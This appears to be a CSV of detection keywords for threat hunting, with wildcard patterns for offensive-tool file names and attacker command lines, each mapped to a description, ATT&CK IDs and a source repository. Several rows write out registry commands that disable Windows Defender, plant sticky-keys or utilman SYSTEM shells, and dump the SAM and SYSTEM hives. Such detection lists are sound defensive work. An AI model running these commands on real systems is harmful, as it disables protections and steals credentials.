-*ReflectiveLoader.cpp*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ReflectiveLoader.h*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*ReflectiveNTDLL.cpp*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,1,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z -*ReflectiveNTDLL.exe*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,1,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z -*ReflectiveNTDLL.sln*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,1,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z -*ReflectiveNTDLL.vcxproj*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,1,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z -*ReflectiveNtdll-main*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,1,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*ReflectivePick_x64_orig.dll*,offensive_tool_keyword,empire,Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1112,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ReflectivePick_x86_orig.dll*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1113,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*RefleXXion*ntdll.dll*,offensive_tool_keyword,RefleXXion,RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.,T1055.004 - T1562.004 - T1070.004,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/RefleXXion,1,1,N/A,10,5,471,96,2022-01-25T17:06:21Z,2022-01-25T16:50:34Z -*RefleXXion.sln*,offensive_tool_keyword,RefleXXion,RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.,T1055.004 - T1562.004 - T1070.004,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/RefleXXion,1,1,N/A,10,5,471,96,2022-01-25T17:06:21Z,2022-01-25T16:50:34Z -*RefleXXion-DLL*,offensive_tool_keyword,RefleXXion,RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.,T1055.004 - T1562.004 - T1070.004,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/RefleXXion,1,1,N/A,10,5,471,96,2022-01-25T17:06:21Z,2022-01-25T16:50:34Z -*RefleXXion-EXE*,offensive_tool_keyword,RefleXXion,RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.,T1055.004 - T1562.004 - T1070.004,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/RefleXXion,1,1,N/A,10,5,471,96,2022-01-25T17:06:21Z,2022-01-25T16:50:34Z -*RefleXXion-main*,offensive_tool_keyword,RefleXXion,RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.,T1055.004 - T1562.004 - T1070.004,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/RefleXXion,1,1,N/A,10,5,471,96,2022-01-25T17:06:21Z,2022-01-25T16:50:34Z -*reg add *HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server* /v fDenyTSConnections /t REG_DWORD /d 0 /f*,greyware_tool_keyword,reg,Allowing remote connections to this computer,T1021.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,N/A,7,7,N/A,N/A,N/A,N/A -*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*,greyware_tool_keyword,reg,Hit F5 a bunch of times when you are at the RDP login screen,T1546.012 - T1059.003 - T1055.001,TA0002 - TA0005,N/A,N/A,Persistence,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*,greyware_tool_keyword,reg,At the login screen press Windows Key+U and you get a cmd.exe window as SYSTEM.,T1546.012 - T1059.003 - T1055.001,TA0002 - TA0005,N/A,N/A,Persistence,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -"*reg add *HKLM\SOFTWARE\Policies\Microsoft\Windows Defender""* /v DisableAntiSpyware /t REG_DWORD /d 1 /f*",greyware_tool_keyword,reg,Defense evasion technique disable windows defender,T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -"*reg add *HKLM\Software\Policies\Microsoft\Windows Defender""*/v *DisableAntiSpyware* /t REG_DWORD /d *1* /f*",greyware_tool_keyword,reg,Disable Real Time Protection,T1562.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*reg add *HKLM\Software\Policies\Microsoft\Windows Defender* /v *DisableAntiVirus* /t REG_DWORD /d *1* /f*,greyware_tool_keyword,reg,Disable Real Time Protection,T1562.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*reg add *HKLM\Software\Policies\Microsoft\Windows Defender* /v Disable* /t REG_DWORD /d 1 /f*,greyware_tool_keyword,reg,Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.,T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*reg add *HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters* /v EnablePrefetcher /t REG_DWORD /f /d 0*,greyware_tool_keyword,reg,Anti forensic - Disabling Prefetch,T1215 - T1562.001 - T1037,TA0008,N/A,N/A,Defense Evasion,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*reg add *HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger* /v *Start* /t REG_DWORD /d *0* /f*,greyware_tool_keyword,reg,Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions,T1562.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,7,N/A,N/A,N/A,N/A -*reg add *HKLM\System\CurrentControlSet\Services\SecurityHealthService* /v *Start* /t REG_DWORD /d *4* /f*,greyware_tool_keyword,reg,Disable Windows Defender Security Center,T1562.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -*REG ADD *igfxCUIService*,offensive_tool_keyword,SysJoker,SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux,T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074,TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002,sysjocker,N/A,Exploitation tools,https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*reg add HKCU\software\policies\microsoft\office\16.0\excel\security /v PythonFunctionWarnings /t REG_DWORD /d 0 /f?*,greyware_tool_keyword,Excel,"prevent any warnings or alerts when Python functions are about to be executed. Threat actors could run malicious code through the new - Microsoft Excel feature that allows Python to run within the spreadsheet",T1112 - T1131 - T1204.002,TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/tsale/Sigma_rules/blob/main/MISC/pythonfunctionwarnings_disabled.yml,1,0,N/A,7,1,88,10,2023-09-13T20:39:02Z,2022-01-11T07:34:37Z -*reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d *,greyware_tool_keyword,reg,Disable Cortex: Change the DLL to a random value,T1547.001 - T1055.001 - T1055.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,8,9,N/A,N/A,N/A,N/A -*reg delete *HKLM\Software\Policies\Microsoft\Windows Defender* /f*,greyware_tool_keyword,reg,Disable Real Time Protection,T1562.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f*,offensive_tool_keyword,reg,Delete run box history,T1056.002 - T1566.001 - T1567.002,TA0004 - TA0040 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -"*reg query ""HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON"" /v CACHEDLOGONSCOUNT*",greyware_tool_keyword,reg,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*reg query hkcu\software\*\putty\session*,greyware_tool_keyword,reg,Query the Windows registry sensitive informations,T1012 - T1003.002,TA0007 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL*,greyware_tool_keyword,reg,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL*,greyware_tool_keyword,reg,Check if LSASS is running in PPL,T1012 - T1003.003,TA0009 - TA0006,N/A,N/A,Reconnaissance,https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL*,greyware_tool_keyword,reg,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,Checking For Hidden Credentials With Appcmd.exe,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*reg query hklm\software\OpenSSH*,greyware_tool_keyword,reg,Query the Windows registry sensitive informations,T1012 - T1003.002,TA0007 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*reg query hklm\software\OpenSSH\Agent*,greyware_tool_keyword,reg,Query the Windows registry sensitive informations,T1012 - T1003.002,TA0007 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*reg query hklm\software\realvnc*,greyware_tool_keyword,reg,Query the Windows registry sensitive informations,T1012 - T1003.002,TA0007 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*reg query hklm\software\realvnc\Allusers*,greyware_tool_keyword,reg,Query the Windows registry sensitive informations,T1012 - T1003.002,TA0007 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*reg query hklm\software\realvnc\Allusers\vncserver*,greyware_tool_keyword,reg,Query the Windows registry sensitive informations,T1012 - T1003.002,TA0007 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*reg query hklm\software\realvnc\vncserver*,greyware_tool_keyword,reg,Query the Windows registry sensitive informations,T1012 - T1003.002,TA0007 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags*,greyware_tool_keyword,reg,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential*,greyware_tool_keyword,reg,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -"*reg save ""HK""L""""M\s""""a""""m"""" win32.dll*",greyware_tool_keyword,reg,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -"*reg save ""HK""L""""M\s""""ys""""t""em"" win32.exe*",greyware_tool_keyword,reg,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -"*reg save ""HK*L*M\s*ec*u*rit*y*"" update.exe*",greyware_tool_keyword,reg,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*reg save hklm\sam *.dat*,greyware_tool_keyword,reg,saves a copy of the registry hive hklm\sam to a .dat file,T1005 - T1003.002,TA0005 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*reg save hklm\sam 1337*,offensive_tool_keyword,SamDumpCable,Dump users sam and system hive and exfiltrate them,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*reg save HKLM\SAM c:*,greyware_tool_keyword,reg,the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.,T1003.002,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*reg save hklm\sam sam*,greyware_tool_keyword,reg,the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.,T1003.002,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*reg save hklm\system *.dat*,greyware_tool_keyword,reg,saves a copy of the registry hive hklm\system to a .dat file,T1005 - T1003.002,TA0005 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*reg save hklm\system 1337*,offensive_tool_keyword,SamDumpCable,Dump users sam and system hive and exfiltrate them,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*reg save HKLM\SYSTEM c:*,greyware_tool_keyword,reg,the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.,T1003.002,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*reg save hklm\system system*,greyware_tool_keyword,reg,the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.,T1003.002,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*reg.exe save HKLM\SAM sam_*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*reg.exe save hklm\sam*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*reg.exe save HKLM\SECURITY security_*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*reg.exe save hklm\security*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*reg.exe save HKLM\SYSTEM sys*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*reg.exe save hklm\system*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*reg.py *@* save -keyName 'HKLM\SAM*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*reg.py *@* save -keyName 'HKLM\SECURITY*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*reg.py *@* save -keyName 'HKLM\SYSTEM*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*reGeorg-master*,offensive_tool_keyword,reGeorg,The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.,T1090 - T1095 - T1572,TA0002 - TA0007 - ,N/A,N/A,Data Exfiltration,https://github.com/sensepost/reGeorg,1,1,N/A,N/A,10,2828,844,2020-11-04T10:36:24Z,2014-08-08T00:58:12Z -*reGeorgSocksProxy.py*,offensive_tool_keyword,reGeorg,The successor to reDuh - pwn a bastion webserver 